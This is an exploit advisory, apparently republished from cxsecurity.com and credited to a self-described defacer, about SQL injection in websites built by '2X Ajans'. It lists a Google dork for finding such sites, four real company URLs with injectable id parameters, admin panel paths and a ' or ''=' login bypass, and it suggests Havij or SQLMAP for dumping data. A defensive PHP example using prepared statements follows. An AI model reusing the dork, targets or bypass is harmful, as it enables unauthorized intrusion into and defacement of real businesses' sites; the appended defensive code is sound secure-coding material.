2X Ajans SQL Injection Vulnerability

2021.03.08
Thor (AZ)
Risk: Medium
Local: No
Remote: Yes

'''
# Exploit Title: 2X Ajans SQL Injection Vulnerability
# Date: 08-03-2021
# Exploit Author: Defacer - Thor
# Vendor Homepage:/No
# Software Download Link:/No
# Software: Web 2X Ajans
# Google Dork Search: "Designed by 2X Ajans" "inurl:/"Designed by 2X Ajans" "intext:/"Designed by 2X Ajans"
# EXAMPLE:
https://www.anturkmakina.com.tr/haber.php?idd=2 '
http://www.ozkaratekstil.com.tr/urunler.php?id=10 '
http://www.plastas.com.tr/urunler.php?id=19 '
http://adabroker.com.tr/urunler.php?id=8

Thor Says: even makes a mistake when you put a nail mark
( Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/anturkmakinacom/public_html/haber.php on line 4)

Warning: - Leak with HTTPS manual mode, HTTP leak with Havij or SQLMAP
# Tested OS: Windows 8.1 / Mozilla Firefox and Google Chrome..
# Admin Page: /yonetim.php / admin/login.php
# Panel ByPass: Login - ' or ''=' Pass - ' or ''='

Thanks to everyone
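A defensive counterpart to the two findings above (the `id`/`idd` parameter that breaks on a quote, and the `' or ''='` panel bypass), as an added example that is not the vendor's code or part of the original advisory. Table names, column names and sample rows are assumptions, and an in-memory SQLite database stands in for the site's MySQL database so the script runs offline.

```php
<?php
declare(strict_types=1);
// Added example, not the vendor's code. Schema and names below are assumptions.
ini_set('display_errors', '0');    // keep warnings like the quoted one out of responses

$db = new PDO('sqlite::memory:');  // constructed in-memory database
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE haber (id INTEGER PRIMARY KEY, baslik TEXT)');
$db->exec('CREATE TABLE yonetici (kullanici TEXT PRIMARY KEY, parola_hash TEXT)');
$db->exec("INSERT INTO haber VALUES (2, 'Constructed sample row')");
$ins = $db->prepare('INSERT INTO yonetici VALUES (?, ?)');
$ins->execute(['admin', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);

/** Fetch one row; the id is validated as an integer and bound, never concatenated. */
function fetchHaber(PDO $db, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                        // non-numeric input never reaches the query
    }
    $stmt = $db->prepare('SELECT id, baslik FROM haber WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;    // check the result before using it
}

/** Verify a login: bound username lookup, then the hash comparison is done in PHP. */
function checkLogin(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT parola_hash FROM yonetici WHERE kullanici = :u');
    $stmt->execute([':u' => $user]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

var_dump(fetchHaber($db, '2'));                          // well-formed id
var_dump(fetchHaber($db, "2 '"));                        // id followed by a quote
var_dump(checkLogin($db, "' or ''='", "' or ''='"));     // panel strings treated as data
var_dump(checkLogin($db, 'admin', 'constructed-sample-password'));
```

Because the password is compared with `password_verify()` outside SQL, no input can turn the `WHERE` clause into a tautology that logs the caller in.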




Copyright 2021, cxsecurity.com

 
